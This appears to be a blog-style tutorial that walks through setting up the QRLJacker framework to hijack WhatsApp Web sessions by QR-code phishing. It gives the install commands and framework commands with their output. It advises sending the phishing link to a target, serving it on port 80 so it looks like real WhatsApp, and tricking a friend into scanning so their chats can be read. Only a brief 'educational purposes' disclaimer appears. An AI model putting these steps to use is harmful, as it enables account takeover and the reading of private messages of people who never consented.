HOW TO HACK WHATSAPP

THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES WE ARE NOT RESPONSIBLE FOR ANY KIND OF MISUSE 

Social Engineering attacks still works. Most of the attackers do use social engineering methods to trick targets. According to ethical hacking researcher of international institute of cyber security social engineering methods are used in QRLJacker, a tool that is used in obtaining whats app web sessions. The whole program is written in python. This tool works on principle of phishing. Phishing is a type of social engineering attack in which fake login pages or payment pages are generated to gather credentials of users.
QRLJacker is most common tool used in whatsapp session hijacking which can be helpful in initial phase of pentesting.

• For testing we have used Live Kali Linux 2019.4 amd64. While testing QrlJacker sometimes, QRLJacker was not working on installed versions of Kali linux. We have tested onLive boot of Kali Linux 2018.4, 2018.3 & 2019.1 amd64.
• Geeko driver act as web browser engine used in applications developed by Mozilla. It creates an link between Selenium (an python module) & Mozilla browser. For installing type wget https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-linux64.tar.gz
• Type tar -xvzf geckodriver-v0.24.0-linux64.tar.gz and change directory to extracted one.
• Type sudo mv -f geckodriver /usr/local/share/geckodriver
• Type sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
• Type sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
• Remember to update firefox browser. For that type sudo apt-get update & sudo apt-get install firefox-esr
• Type apt-get install python3.7
• Type git clone https://github.com/OWASP/QRLJacking
• Type python3.7 -m pip install -r requirements.txt
• Type python3.7 QrlJacker.py

Code

_____________________________________ !\/ ! \/ ./ !/\ ! |\ ./ ! \ ! / \ ./ ! \______!______| \ ,/ ! /\ ! ./\ ,/ ! / \ ! | \ ,/ !/ \___!____| ,/ Everything is connected, even the simplest things! ! / \ _!__ *\,/ ! ! \ ! \,/ ! ! | \! ,/ !----------K/ ! ! ,! /| QrlJacker-Framework By @D4Vinci - V2.1 ! !/ / | Attack vector By Mohamed Abdelbasset Elnouby (@SymbianSyMoh) ! / \ / | Loaded 1 grabber(s), 0 post module(s). !\./ \/ | !/\ / | ! \ / .o. ! \/ :O: ! / " ! / ! / !/ ! ! !

Type help

QrlJacker > help

General commands
=================
        Command               Description
        ---------             -------------
        help/?                Show this help menu.
        os      <command>     Execute a system command without closing the framework
        banner                Display banner.
        exit/quit             Exit the framework.

Core commands
=============
        Command               Description
        ---------             -------------
        database              Prints the core version, check if framework is up-to-date and update if you are not up-to-date.
        debug                 Drop into debug mode or disable it. (Making identifying problems easier)
        dev                   Drop into development mode or disable it. (Reload modules every use)
        verbose               Drop into verbose mode or disable it. (Make framework displays more details)
        reload/refresh        Reload the modules database.

• Type list & type use grabber/whatsapp

 QrlJacker > list
 Name              Description
  grabber/whatsapp  Whatsapp QR-sessions grabber and controller
 QrlJacker > use grabber/whatsapp 

• Type options & type set port 1337
• Type set host 192.168.1.7

 QrlJacker Module(grabber/whatsapp) > set port 1337
 [+] port => 1337
 QrlJacker Module(grabber/whatsapp) > set host 192.168.1.7
 [+] host => 192.168.1.7 
QrlJacker Module(grabber/whatsapp) > options
 Name       Current value  Required  Description
  port       1337             Yes       The local port to listen on.
  host       192.168.1.7        Yes       The local host to listen on.
  useragent  (default)      Yes       Make useragent is the (default) one, a (random) generated useragent or a specifed useragent 

Type run, you can also run this on port 80 rather than 1337, to look it like a real page of whatsapp

 QrlJacker Module(grabber/whatsapp) > run  

QrlJacker Module(grabber/whatsapp) > run
 [+] Using the default useragent
 [+] Running a thread to keep the QR image  [whatsapp]
 [+] Waiting for sessions on whatsapp
 [+] Running a thread to detect Idle once it happens then click the QR reload button [whatsapp]
 [+] Initializing webserver… [whatsapp]

• After starting Qrljacker server. You can send this link to your target. For testing we have opened generated QrlJacker Code on Windows 7. Type 192.168.1.7:1337 
  

• For usage we have opened on whatsapp 2.19.98. Scan the QR code in Whatsapp web of your mobile or ask your friend to login in whatsapp web using social engineering techniques
  

• Go to terminal where you have started QrlJacker on Kali. Type sessions Sessions will shows connected Whats app accounts to QrlJacker sessions.

QrlJacker Module(grabber/whatsapp) > sessions
 ID  Module name  Captured on              
  0   whatsapp     Sat-Apr-13-04:53:03-2019 

• As you type sessions -i 0, Kali Linux web browser will open with target Whatsapp account First it will open web.whatsapp.com.
  

• But after 1 or 2 seconds target Whatsapp account will open.
  

• Now you can see all the chat of whatsapp.

SHARE AND COMMENT 

IF YOU HAVE ANY QUESTION YOU CAN ASK BELOW

THANKS